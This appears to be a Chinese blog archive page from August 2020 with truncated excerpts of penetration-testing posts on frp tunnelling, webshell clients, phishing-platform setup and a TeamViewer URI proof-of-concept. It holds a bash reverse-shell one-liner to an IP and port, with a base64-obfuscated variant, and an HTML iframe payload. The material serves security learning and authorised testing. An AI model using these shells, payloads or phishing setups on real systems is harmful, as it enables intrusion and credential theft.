08 2020 档案

摘要：简介：frp是一款使用go语言写的一个轻量级的内网穿透工具，其全名为Fast Reverse Proxy，支持TCP,UDP,HTTP,HTTPS等协议类型，话不多说开始上手。 1.肯定是要有一台vps，这里推荐学生党抓紧时间在什么腾讯云，阿里云去购买一年一百，买到就是赚到。 wget https: 阅读全文

摘要：文章来源与合天智汇 概述： 首先了解一下什么是webshell客户端，先问个问题,什么是客户端,什么是服务端? 很简单，提供服务的就是服务端，要求被服务的就是客户端。那么回到我们的场景中，如果已经种了后门，用于连接后门的程序是要求被服务的，比如执行个ps，目的是为了得到后门所在主机的进程列表，是“被 阅读全文

摘要：一、Linux反弹shell 姿势1 bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版：bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+ 阅读全文

摘要：一、首先要了解一下每一个模块的作用： 1：仪表盘，展示被攻击的详情 2：在此配置每次要进行的攻击 3：在这里设置要进行攻击的邮箱地址 4：设置钓鱼邮件模板 5：设置钓鱼页面模板 6：设置发送钓鱼邮件的邮箱 二、实战操作 1、在第6个选项设置要发送邮件的邮箱地址 然后点击绿色按钮进行测试发送,只需要填 阅读全文

摘要：<html><head>test poc</head><body><div><iframe style="height:1px;width:1px;" src='teamviewer10: --play \\127.0.0.1\share\fake.tvs'"></div></body></html 阅读全文

摘要：最近要在客户现场做一次钓鱼测试，开始用的自己的云服务器搭了一个钓鱼平台，但是发现国内的25端口全被禁了，自己有没有国外的服务器没办法只能用自己的虚拟机了。 下面是安装步骤： 1、安装https协议、CA证书、dirmngr apt-get update 、apt-get install -y apt 阅读全文